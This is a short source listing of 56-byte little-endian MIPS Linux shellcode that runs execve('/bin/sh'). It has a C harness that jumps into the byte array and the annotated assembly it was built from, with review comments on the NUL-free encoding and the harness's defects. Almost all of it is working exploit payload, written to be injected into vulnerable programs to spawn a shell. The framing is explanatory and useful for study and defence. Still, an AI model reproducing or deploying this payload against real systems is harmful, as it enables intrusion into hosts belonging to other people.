/* 56 bytes execve /bin/sh shellcode - linux-mipsel
 * - by core (core@bokeoa.com)
 *
 * Note: For MIPS running in little-endian mode.
 * Tested on a Cobalt Qube2 server running Linux 2.4.18
 *
 * Greetz to bighawk... i couldn't get his execve to work
 * for some reason :/
 */

/* Listing layout: a C test harness (code[] + main) followed by the MIPS
 * assembly source the 48 instruction bytes were assembled from. The two are
 * separate artifacts: the `#;;;` assembler comments further down are not C,
 * and the preprocessor would reject them if this listing were compiled as a
 * single file.
 *
 * What the bytes do (per-instruction notes are on the assembly below):
 * execve("/bin/sh", {"/bin/sh", NULL}, NULL) through o32 syscall 4011.
 * Properties an analyst will recognise when triaging it: no encoded word
 * contains a 0x00 byte (the only zero is the C string literal's implicit
 * terminator), the path is located PC-relatively via a raw-encoded
 * branch-and-link, and stack/link-register offsets of +/-0x666 are used so
 * every immediate stays non-zero.
 */

/* Payload bytes: twelve 4-byte little-endian MIPS instruction words (48 bytes)
 * followed by "/bin/sh" with no terminator of its own; the array's implicit
 * '\0' is what makes sizeof(code) report 56 for a 55-byte payload, and it is
 * also what terminates the pathname when the harness runs it. */
char code[] =
    /* 16 byte setreuid(0,0) by bighawk */
    //"\xff\xff\x04\x30\xff\xff\x05\x30"
    //"\xe6\x0f\x02\x34\xcc\x48\x49\x03"
    /* 56 byte execve("/bin/sh",["/bin/sh"],[]) by core */
    "\xff\xff\x10\x04\xab\x0f\x02\x24"  /* bltzal $0,.      ; li $2,4011        */
    "\x55\xf0\x46\x20\x66\x06\xff\x23"  /* addi $6,$2,-4011 ; addi $31,$31,0x666 */
    "\xc2\xf9\xec\x23\x66\x06\xbd\x23"  /* addi $12,$31,-0x63e ; addi $29,$29,0x666 */
    "\x9a\xf9\xac\xaf\x9e\xf9\xa6\xaf"  /* sw $12,-0x666($29) ; sw $6,-0x662($29) */
    "\x9a\xf9\xbd\x23\x21\x20\x80\x01"  /* addi $29,$29,-0x666 ; move $4,$12     */
    "\x21\x28\xa0\x03\xcc\xcd\x44\x03"  /* move $5,$29      ; syscall 0xd1337   */
    "/bin/sh";

/* Test harness: treats the data array as code and jumps into it.
 *
 * NOTE(review): this relies on the .data segment being executable. Under
 * W^X / NX (the default for modern toolchains and kernels) the indirect call
 * faults instead of running the payload; the harness predates that default.
 * NOTE(review): C defects, left as written because this is a historical
 * listing: implicit `int main()` and an implicit declaration of printf (no
 * <stdio.h>) are pre-C99 only; `%d` with a size_t argument is a format
 * mismatch (`%zu`); converting an object pointer to a function pointer via
 * `(void *)` is not portable C. */
main() {
    void (*a)() = (void *)code;
    printf("size: %d bytes\n", sizeof(code));
    a();
}

#;;; MIPS (Little Endian) Linux Execve /bin/sh Shellcode
#;;;
#;;; by Charles 'core' Stevenson
#;;;
#;;; Greetz: bighawk, 0dd, #social (pulltheplug.org), #de (dievo.org)
#
# o32 register conventions used below: $2 = $v0 (syscall number),
# $4..$6 = $a0..$a2 (arguments), $29 = $sp, $31 = $ra. Every immediate is
# chosen so that no encoded instruction word contains a 0x00 byte.
    .globl main
main:
    .long 0x0410ffff           # raw-encoded bltzal $0, . : never branches,
                               # but always links, so $31 = this word + 8
    li $2, 4011                # $v0 = __NR_execve (o32: 4000 + 11)
    addi $6, $2, -4011         # $a2 = 0 (envp = NULL) without a zero immediate
    addi $31, $31, 0x666       # bias $31 so the next step needs no small immediate
    sub $12, $31, 0x666 - 40   # $12 = main + 48 = address of the "/bin/sh" bytes
    addi $29, $29, 0x666       # bias $sp the same way
    sw $12, -0x666($29)        # [sp+0] = pointer to "/bin/sh"  (argv[0])
    sw $6, -0x666+4($29)       # [sp+4] = NULL                  (argv[1])
    sub $29, $29, 0x666        # un-bias $sp; it now points at argv
    move $4, $12               # $a0 = pathname
    move $5, $29               # $a1 = argv
    syscall 0xd1337            # code field is not interpreted by the kernel;
                               # a non-zero value keeps the encoding NUL-free
    .ascii "/bin/sh"           # no terminator here: depends on the byte that
                               # follows the payload in memory being zero